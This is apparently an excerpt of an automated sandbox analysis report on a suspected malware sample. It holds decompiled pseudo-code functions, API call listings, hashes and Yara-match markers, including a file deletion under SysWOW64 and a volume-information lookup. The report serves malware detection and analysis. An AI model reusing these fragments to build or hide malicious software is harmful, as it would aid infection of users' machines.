                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile
                  • String ID: C:\Windows\SysWOW64\fwdrrebrand.exe
                  • API String ID: 4033686569-640560957
                  • Opcode ID: ad47f1fe805382f4c79d546fd07777c89679d1b14abac8290670a6d98f7a734e
                  • Instruction ID: 8642d73c5bbb76fb491ee4fa5c2997b03a62a29dd84fc22f192483507b850f08
                  • Opcode Fuzzy Hash: ad47f1fe805382f4c79d546fd07777c89679d1b14abac8290670a6d98f7a734e
                  • Instruction Fuzzy Hash: 2CE02071D4032893DF6076A86C0DADB375DCB40310F0005D1EADFA3181EE745D284BD5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00404461(void* __eflags, intOrPtr _a4) {
                  				void* _t3;
                  				intOrPtr* _t4;
                  				void* _t7;
                  				void* _t10;
                  				void* _t11;
                  				void* _t12;
                  
                  				while(1) {
                  					_t3 = E0043108C(_t7, _t10, _t11, _a4); // executed
                  					_t12 = _t3;
                  					if(_t12 != 0) {
                  						break;
                  					}
                  					_t4 =  *0x462298; // 0x404445
                  					if(_t4 != 0) {
                  						_push(_a4);
                  						if( *_t4() != 0) {
                  							continue;
                  						}
                  					}
                  					break;
                  				}
                  				return _t12;
                  			}










                  APIs
                  • _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 0043108C: __FF_MSGBANNER.LIBCMT ref: 004310AF
                    • Part of subcall function 0043108C: __NMSG_WRITE.LIBCMT ref: 004310B6
                    • Part of subcall function 0043108C: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,004381A2,00000001,00000001,00000001,?,0043A049,00000018,0045E2A8,0000000C,0043A0DA), ref: 00431103
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AllocateHeap_malloc
                  • String ID: ED@
                  • API String ID: 501242067-1809407400
                  • Opcode ID: 6e25af06defa9b9827857281b9dce4e04c166c3dc53613bcea4009c0ca779b1c
                  • Instruction ID: 390a9ce1f592537ae75951aa16ff758075523778642dbaca2e903489ec7b59e7
                  • Opcode Fuzzy Hash: 6e25af06defa9b9827857281b9dce4e04c166c3dc53613bcea4009c0ca779b1c
                  • Instruction Fuzzy Hash: D0D0C2722041256B8A1055AAEC10A5A7758CBC07F07080137FE08E62A0DA75DC0142C9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00416609(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t36;
                  				void* _t37;
                  				intOrPtr _t39;
                  				intOrPtr _t46;
                  				intOrPtr _t47;
                  				intOrPtr _t53;
                  				void* _t55;
                  				intOrPtr _t69;
                  				void* _t72;
                  				intOrPtr _t76;
                  				void* _t80;
                  				void* _t83;
                  
                  				_t72 = __edx;
                  				_push(4);
                  				E00431A9B(E0044B3E2, __ebx, __edi, __esi);
                  				_t79 = __ecx;
                  				_t76 =  *((intOrPtr*)(_t80 + 8));
                  				_t36 =  *((intOrPtr*)(_t76 + 0x14));
                  				 *((intOrPtr*)(_t80 - 0x10)) = 1;
                  				if(_t36 == 0) {
                  					_t37 = E0041F363(0, _t76, __ecx, __eflags);
                  					_t39 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) + 0xc))(0xe100, 0, 0, 0);
                  					__eflags = _t39;
                  					if(_t39 == 0) {
                  						E00417F31(_t79);
                  					}
                  					__eflags =  *((intOrPtr*)(_t79 + 0x20));
                  					L29:
                  					if(__eflags != 0) {
                  						L31:
                  						return E00431B73( *((intOrPtr*)(_t80 - 0x10)));
                  					}
                  					L30:
                  					 *((intOrPtr*)(_t80 - 0x10)) = 0;
                  					goto L31;
                  				}
                  				_t83 = _t36 - 1;
                  				if(_t83 == 0) {
                  					_push( *((intOrPtr*)(_t76 + 0x18)));
                  					__eflags =  *((intOrPtr*)( *__ecx + 0x88))();
                  					goto L29;
                  				}
                  				if(_t83 <= 0) {
                  					goto L31;
                  				}
                  				if(_t36 <= 3) {
                  					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                  					_push( *((intOrPtr*)(_t76 + 0x18)));
                  					_t46 =  *((intOrPtr*)( *__ecx + 0x88))();
                  					__eflags = _t46;
                  					if(_t46 != 0) {
                  						_t47 =  *((intOrPtr*)(__ecx + 0x20));
                  						 *((intOrPtr*)(__ecx + 0x8c)) = _t76;
                  						__eflags = _t47;
                  						if(__eflags == 0) {
                  							_t47 = E00406436(0, __ecx, _t76, __ecx, __eflags);
                  						}
                  						SendMessageA( *(_t47 + 0x20), 0x111, 0xe108, 0);
                  						 *((intOrPtr*)(_t79 + 0x8c)) = 0;
                  					}
                  					goto L30;
                  				}
                  				if(_t36 == 4) {
                  					 *((intOrPtr*)(__ecx + 0x8c)) =  *((intOrPtr*)(__ecx + 0x4c));
                  					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                  					goto L31;
                  				}
                  				if(_t36 == 5) {
                  					 *((intOrPtr*)( *__ecx + 0x80))();
                  					 *((intOrPtr*)(_t80 - 0x10)) = 0;
                  					__eflags =  *((intOrPtr*)(__ecx + 0x8c));
                  					if(__eflags != 0) {
                  						goto L31;
                  					}
                  					_t69 = E00404461(__eflags, 0x28);
                  					 *((intOrPtr*)(_t80 + 8)) = _t69;
                  					 *((intOrPtr*)(_t80 - 4)) = 0;
                  					L16:
                  					_t91 = _t69;
                  					if(_t69 == 0) {
                  						_t53 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t53 = E0041576C(_t69, _t91);
                  					}
                  					 *((intOrPtr*)(_t79 + 0x8c)) = _t53;
                  					 *((intOrPtr*)(_t53 + 0x14)) = 6;
                  					goto L31;
                  				}
                  				if(_t36 != 6) {
                  					goto L31;
                  				}
                  				_t55 =  *((intOrPtr*)( *__ecx + 0x84))();
                  				if( *((intOrPtr*)(_t76 + 8)) == 0) {
                  					_push(0xffffffff);
                  					_push(0);
                  					_t89 = _t55;
                  					if(_t55 == 0) {
                  						_push(0xf10c);
                  					} else {
                  						_push(0xf10b);
                  					}
                  					E00417146(0, _t72, _t76, _t79, _t89);
                  				}
                  				 *((intOrPtr*)(_t80 - 0x10)) = 0;
                  				_t90 =  *((intOrPtr*)(_t79 + 0x8c));
                  				if( *((intOrPtr*)(_t79 + 0x8c)) != 0) {
                  					goto L31;
                  				} else {
                  					_t69 = E00404461(_t90, 0x28);
                  					 *((intOrPtr*)(_t80 + 8)) = _t69;
                  					 *((intOrPtr*)(_t80 - 4)) = 1;
                  					goto L16;
                  				}
                  			}
















                  APIs
                  • __EH_prolog3.LIBCMT ref: 00416610
                  • SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00416732
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3MessageSend
                  • String ID:
                  • API String ID: 936991600-0
                  • Opcode ID: e4de2e1b29feed0a13db066fa8e5efa98775103b20291ef35618312c6e1f6ce6
                  • Instruction ID: 70473528937c0bf9d11c87dc8b8dc0f91426da9b43ce8fb73777ee02d115459c
                  • Opcode Fuzzy Hash: e4de2e1b29feed0a13db066fa8e5efa98775103b20291ef35618312c6e1f6ce6
                  • Instruction Fuzzy Hash: 4F414F74600611DFDB249F69C888AAAB7F0BB58308F11893FE156D7391DB78D8C18F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E004185A1(void* __ebx, intOrPtr* __ecx, void* __edx, void* __eflags, signed int _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				struct tagRECT _v20;
                  				signed int _v24;
                  				signed int _v36;
                  				char _v68;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t37;
                  				signed int _t38;
                  				signed int _t49;
                  				void* _t56;
                  				void* _t78;
                  				void* _t81;
                  				intOrPtr* _t85;
                  
                  				_t90 = __eflags;
                  				_t78 = __edx;
                  				_t56 = __ebx;
                  				_push(_t81);
                  				_t85 = __ecx;
                  				 *((intOrPtr*)(__ecx + 0x8c)) = _a28;
                  				E00411F96(__ebx, __ecx, _t81, __ecx, __eflags, 0x10);
                  				E00411F96(__ebx, __ecx, _t81, __ecx, _t90, 0x3c000);
                  				E00431160(0,  &_v68, 0, 0x30);
                  				if(_a12 == 0) {
                  					_a12 = 0x50800000;
                  				}
                  				_v36 = _a12;
                  				_push( &_v68);
                  				if( *((intOrPtr*)( *_t85 + 0x64))() != 0) {
                  					_t37 = E00417E26(_t85, _t78, __eflags,  *((intOrPtr*)(_t85 + 0x88)), _a20); // executed
                  					__eflags = _t37;
                  					if(_t37 == 0) {
                  						goto L3;
                  					} else {
                  						 *((intOrPtr*)(_t85 + 0x8c)) = 0;
                  						E00412B6C(_t85, 0xc00000, _v36 & 0x00c00000, 0);
                  						E00412B98(_t85, 0x200, _v24 & 0x00000200, 0);
                  						E00412C0B(_t85, _a24);
                  						GetWindowRect( *(_t85 + 0x20),  &_v20);
                  						E00419E93(_t56, _t85, 0, _t85, __eflags, 1, _v20.right - _v20.left, _v20.bottom - _v20.top, 0x4527fc, 0x4527fc);
                  						_t49 = E004122AD(_t85,  *((intOrPtr*)(_t85 + 0x88)));
                  						__eflags = _t49;
                  						if(_t49 == 0) {
                  							goto L3;
                  						} else {
                  							_t50 = _a16;
                  							_push(_t56);
                  							E00412D05(_t85, 0,  *_a16,  *((intOrPtr*)(_t50 + 4)),  *((intOrPtr*)(_t50 + 8)) -  *_a16,  *((intOrPtr*)(_t50 + 0xc)) -  *((intOrPtr*)(_t50 + 4)), 0x14); // executed
                  							__eflags = _a12 & 0x10000000;
                  							if((_a12 & 0x10000000) != 0) {
                  								E00412C34(_t85, 1); // executed
                  							}
                  							_t38 = 1;
                  							__eflags = 1;
                  						}
                  					}
                  				} else {
                  					L3:
                  					_t38 = 0;
                  				}
                  				return _t38;
                  			}


















                  APIs
                    • Part of subcall function 00411F96: _memset.LIBCMT ref: 00411FC6
                  • _memset.LIBCMT ref: 004185D0
                    • Part of subcall function 00417E26: FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                    • Part of subcall function 00417E26: LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                    • Part of subcall function 00417E26: LockResource.KERNEL32(00000000), ref: 00417E57
                    • Part of subcall function 00417E26: FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  • GetWindowRect.USER32 ref: 00418653
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$_memset$FindFreeLoadLockRectWindow
                  • String ID:
                  • API String ID: 2572468386-0
                  • Opcode ID: 2c2feab1a74483de2365b3fae192b7c3f521a05bb95ecf08c35458e0af3a68d2
                  • Instruction ID: cc6bf4f3222145c678c235a5d4e7989ebcd45410e0d0120669b6de292d8644ed
                  • Opcode Fuzzy Hash: 2c2feab1a74483de2365b3fae192b7c3f521a05bb95ecf08c35458e0af3a68d2
                  • Instruction Fuzzy Hash: EE313971600209AFEB14EF69CD55FBF77A9EB88704F00411EF906D3291DBB8AD518A68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E0040ACDF(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t29;
                  				void* _t31;
                  				struct HMENU__* _t36;
                  				signed short _t63;
                  				intOrPtr* _t66;
                  				void* _t67;
                  				void* _t68;
                  
                  				_t61 = __edx;
                  				_t46 = __ebx;
                  				_push(4);
                  				E00431A9B(E0044AE45, __ebx, __edi, __esi);
                  				_t66 = __ecx;
                  				_t63 =  *(_t68 + 8);
                  				 *(__ecx + 0xa4) = _t63;
                  				E004014C0(_t68 + 8, __edx);
                  				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                  				_t52 = _t68 + 8;
                  				_t29 = E00402720(_t68 + 8, _t63);
                  				_t70 = _t29;
                  				if(_t29 != 0) {
                  					E0041B29E(_t66 + 0xc4,  *(_t68 + 8), 0, 0xa);
                  				}
                  				E00411F96(_t46, _t52, _t63, _t66, _t70, 8);
                  				_t31 = E00408C1D(_t46, _t66, _t70,  *((intOrPtr*)(_t68 + 0xc)), _t63);
                  				E00405562(_t68 - 0x10, _t70, _t66 + 0xc4);
                  				_push( *((intOrPtr*)(_t68 + 0x14)));
                  				_push(0);
                  				_t64 = _t63 & 0x0000ffff;
                  				_push(_t63 & 0x0000ffff);
                  				_push( *((intOrPtr*)(_t68 + 0x10)));
                  				_push(0x46279c);
                  				_push( *((intOrPtr*)(_t68 + 0xc)));
                  				 *(_t68 - 4) = 1;
                  				_push( *((intOrPtr*)(_t68 - 0x10)));
                  				_push(_t31); // executed
                  				if( *((intOrPtr*)( *_t66 + 0x13c))() != 0) {
                  					__eflags =  *((intOrPtr*)(_t66 + 0xd4)) - 1;
                  					if(__eflags != 0) {
                  						_t36 =  *(_t66 + 0xd8);
                  					} else {
                  						_t36 = GetMenu( *(_t66 + 0x20));
                  					}
                  					_t56 = _t66;
                  					 *(_t66 + 0x5c) = _t36;
                  					E00408862(_t66, __eflags, _t64);
                  					__eflags =  *((intOrPtr*)(_t68 + 0x14));
                  					if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
                  						E0040F918(1, _t56,  *(_t66 + 0x20), 0x364, 0, 0, 1, 1); // executed
                  					}
                  					_t67 = 1;
                  					goto L4;
                  				} else {
                  					_t67 = 0;
                  					L4:
                  					E004010B0( *((intOrPtr*)(_t68 - 0x10)) + 0xfffffff0, _t61);
                  					E004010B0( *(_t68 + 8) + 0xfffffff0, _t61);
                  					return E00431B73(_t67);
                  				}
                  			}











                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Menu
                  • String ID:
                  • API String ID: 3706238695-0
                  • Opcode ID: 4980b77b380ecdf8f607853d1d864b43a4b1bd649bfc2099a66247c299cd0400
                  • Instruction ID: eeb843b551fa435bf3fec831ef0401d74a3c4f4e1e69e6eff3f7a39c04ab7661
                  • Opcode Fuzzy Hash: 4980b77b380ecdf8f607853d1d864b43a4b1bd649bfc2099a66247c299cd0400
                  • Instruction Fuzzy Hash: EE21A071600304AFDB20AF71CC41FAF77B9AF44309F00452EBA56672E1DB789950DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E0040AF79(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
                  				struct HMENU__* _v8;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t28;
                  				intOrPtr* _t30;
                  				intOrPtr _t33;
                  				intOrPtr _t35;
                  				struct HMENU__* _t39;
                  				void* _t42;
                  				intOrPtr _t48;
                  				intOrPtr _t51;
                  				intOrPtr* _t57;
                  
                  				_t42 = __ebx;
                  				_push(__ecx);
                  				_t57 = __ecx;
                  				_v8 = 0;
                  				_t59 = _a24;
                  				if(_a24 == 0) {
                  					L4:
                  					E00402CA0(_t57 + 0xc4, _t57, _a8);
                  					_t28 = _a20;
                  					__eflags = _t28;
                  					if(_t28 != 0) {
                  						_a24 =  *((intOrPtr*)(_t28 + 0x20));
                  					} else {
                  						_a24 = 0;
                  					}
                  					_t30 = _a16;
                  					_t48 =  *((intOrPtr*)(_t30 + 4));
                  					_t51 =  *_t30;
                  					_t33 =  *((intOrPtr*)( *_t57 + 0x5c))(_a28, _a4, _a8, _a12, _t51, _t48,  *((intOrPtr*)(_t30 + 8)) - _t51,  *((intOrPtr*)(_t30 + 0xc)) - _t48, _a24, _v8, _a32, _t42);
                  					__eflags = _t33;
                  					if(_t33 != 0) {
                  						_t35 = 1;
                  						__eflags = 1;
                  						goto L11;
                  					} else {
                  						__eflags = _v8 - _t33;
                  						if(_v8 != _t33) {
                  							DestroyMenu(_v8);
                  						}
                  						L3:
                  						_t35 = 0;
                  						L11:
                  						return _t35;
                  					}
                  				}
                  				_t39 = LoadMenuA( *(E0041F363(__ebx, 0, __ecx, _t59) + 0xc), _a24);
                  				_v8 = _t39;
                  				if(_t39 != 0) {
                  					goto L4;
                  				}
                  				 *((intOrPtr*)( *_t57 + 0x11c))();
                  				goto L3;
                  			}

















                  APIs
                  • LoadMenuA.USER32 ref: 0040AF99
                  • DestroyMenu.USER32(?,?,?,?,?,?,?,?,?), ref: 0040B014
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$DestroyLoad
                  • String ID:
                  • API String ID: 588275208-0
                  • Opcode ID: 011dedb1d4b93fb0fec950f638cbb21010f1c2d5a66f29dead3501da4ea3d920
                  • Instruction ID: 118bc1eea92f049343cb41fc0e01d682e6849735effaaea45bedc3916b800edf
                  • Opcode Fuzzy Hash: 011dedb1d4b93fb0fec950f638cbb21010f1c2d5a66f29dead3501da4ea3d920
                  • Instruction Fuzzy Hash: F52168B521020AEFCF11CF65C9488AABBB5FF88354B108466F815A7261D738DD21DF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00426D44(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t32;
                  				void* _t40;
                  				void* _t52;
                  				signed int _t54;
                  				void* _t56;
                  				void* _t57;
                  				void* _t58;
                  				void* _t59;
                  
                  				_t59 = __eflags;
                  				_t52 = __edx;
                  				_t44 = __ebx;
                  				_push(0x10);
                  				E00431A9B(E0044C2F5, __ebx, __edi, __esi);
                  				_t56 = __ecx;
                  				 *(_t57 - 0x14) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) + 0xa;
                  				 *(_t57 - 0x10) = E00404461(_t59,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) + 0xa);
                  				_t32 = E0041F363(__ebx, __edi, _t56, _t59);
                  				_t54 = 0;
                  				 *((intOrPtr*)(_t57 - 0x18)) =  *((intOrPtr*)(_t32 + 4));
                  				if( *((intOrPtr*)(_t56 + 4)) > 0) {
                  					do {
                  						_t9 = _t54 + 1; // 0x1
                  						_t44 = _t9;
                  						swprintf( *(_t57 - 0x10),  *(_t57 - 0x14),  *(_t56 + 0x10), _t44);
                  						_t58 = _t58 + 0x10;
                  						_t40 = E00426700( *((intOrPtr*)(_t57 - 0x18)), _t57 - 0x1c,  *((intOrPtr*)(_t56 + 0xc)),  *(_t57 - 0x10), 0x44f0f5); // executed
                  						 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
                  						E004057D4( *((intOrPtr*)(_t56 + 8)) + _t54 * 4, _t40);
                  						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
                  						E004010B0( *((intOrPtr*)(_t57 - 0x1c)) + 0xfffffff0, _t52);
                  						_t54 = _t44;
                  						_t61 = _t54 -  *((intOrPtr*)(_t56 + 4));
                  					} while (_t54 <  *((intOrPtr*)(_t56 + 4)));
                  				}
                  				return E00431B73(E00404490(_t44, _t54, _t56, _t61,  *(_t57 - 0x10)));
                  			}












                  APIs
                  • __EH_prolog3.LIBCMT ref: 00426D4B
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • swprintf.LIBCMT ref: 00426D88
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3__vsprintf_s_l_mallocswprintf
                  • String ID:
                  • API String ID: 367293577-0
                  • Opcode ID: 3a214aab7a86e2a5f63ff26eeba659317651d5fcca418b5b44d70a51458bef8e
                  • Instruction ID: 9573cca5b79f8fc0a76bfd734ff5aaffca9d9069506fe4030a5ee5cff69ba3c8
                  • Opcode Fuzzy Hash: 3a214aab7a86e2a5f63ff26eeba659317651d5fcca418b5b44d70a51458bef8e
                  • Instruction Fuzzy Hash: B711A371D0060A9FCB10EFA5C882E6FB3F5FF44318F10492EF121A72A1CB38A9408B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E004292E7(intOrPtr __ebx, intOrPtr __edx, struct HINSTANCE__* _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				char _v268;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t8;
                  				long _t14;
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  				intOrPtr _t26;
                  				intOrPtr _t29;
                  				intOrPtr _t32;
                  				signed int _t36;
                  
                  				_t26 = __edx;
                  				_t19 = __ebx;
                  				_t34 = _t36;
                  				_t8 =  *0x463404; // 0x18eab29f
                  				_v8 = _t8 ^ _t36;
                  				_t28 = _a8;
                  				GetModuleFileNameA(_a4,  &_v268, 0x104);
                  				_t14 = GetShortPathNameA( &_v268, E004014F0(_a8, 0x104), 0x104); // executed
                  				if(_t14 == 0) {
                  					E00402830(_t26, _t28,  &_v268);
                  				}
                  				_t15 = E0040A356(_t28, 0xffffffff);
                  				_pop(_t29);
                  				_pop(_t32);
                  				return E00430650(_t15, _t19, _v8 ^ _t34, _t26, _t29, _t32);
                  			}
















                  APIs
                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                  • GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Name$FileModulePathShort
                  • String ID:
                  • API String ID: 4073693819-0
                  • Opcode ID: 905a4995cd81f9c0174dea4ed714b7411b98bcdaeadfe175916a8af081c008a5
                  • Instruction ID: 8e1aa580d8501399bd92b9dd3bfa18adfe58bb0007ac89ee96572330ca29169d
                  • Opcode Fuzzy Hash: 905a4995cd81f9c0174dea4ed714b7411b98bcdaeadfe175916a8af081c008a5
                  • Instruction Fuzzy Hash: FCF0A4766000146BCB10EFAADC45DEFB7ADEF99324F04416AF845E32C1DF78AA418B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 023EA8A3
                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,023F0D98,00000000,00000000,00000000,00000000), ref: 023EA8E6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: DirectoryInformationVolumeWindows
                  • String ID:
                  • API String ID: 3487004747-0
                  • Opcode ID: 8655554531e0ec3226f801076e3529c545d3ae9ca9f9c8edba7825877c693133
                  • Instruction ID: 947347421add9d8fbdcf6b6765822ca6342fddc9748acf0ad9a49ac75f9e9d35
                  • Opcode Fuzzy Hash: 8655554531e0ec3226f801076e3529c545d3ae9ca9f9c8edba7825877c693133
                  • Instruction Fuzzy Hash: E8F089A5D403149AEF649764DC09EB777BCDF80700F04C19AF56A83091FB70998587E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00410F0D(void* __eflags, intOrPtr _a4) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HHOOK__* _t6;
                  				void* _t8;
                  				void* _t10;
                  				intOrPtr _t11;
                  				void* _t12;
                  				struct HHOOK__* _t13;
                  
                  				_t6 = E00420AEC(_t8, 0x466508, _t10, _t12, __eflags, 0x406452);
                  				_t13 = _t6;
                  				_t15 = _t13;
                  				if(_t13 == 0) {
                  					_t6 = E00406436(_t8, 0x466508, _t10, _t13, _t15);
                  				}
                  				_t11 = _a4;
                  				if( *((intOrPtr*)(_t13 + 0x14)) == _t11) {
                  					return _t6;
                  				} else {
                  					if( *(_t13 + 0x28) == 0) {
                  						_t6 = SetWindowsHookExA(5, E00410CBA, 0, GetCurrentThreadId()); // executed
                  						 *(_t13 + 0x28) = _t6;
                  						_t18 = _t6;
                  						if(_t6 == 0) {
                  							_t6 = E004063FE(_t8, 0x466508, _t11, _t13, _t18);
                  						}
                  					}
                  					 *((intOrPtr*)(_t13 + 0x14)) = _t11;
                  					return _t6;
                  				}
                  			}













                  APIs
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                  • GetCurrentThreadId.KERNEL32 ref: 00410F3C
                  • SetWindowsHookExA.USER32 ref: 00410F4C
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$CurrentException@8HookThreadThrowWindows
                  • String ID:
                  • API String ID: 1415497866-0
                  • Opcode ID: 37f3d0fc7647bf2c85f398416bb1e7c84d4a3ea5ec68988cbb3fd77fc1d52bf8
                  • Instruction ID: 6c588268bc8433113d32a2b5924d2362cc050002e169fed3ae89e1c569c52b8e
                  • Opcode Fuzzy Hash: 37f3d0fc7647bf2c85f398416bb1e7c84d4a3ea5ec68988cbb3fd77fc1d52bf8
                  • Instruction Fuzzy Hash: 9CF0273260071077C7302F67A806B577798EBC0B61F11013FFA0656280D6F8D8C1C6AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
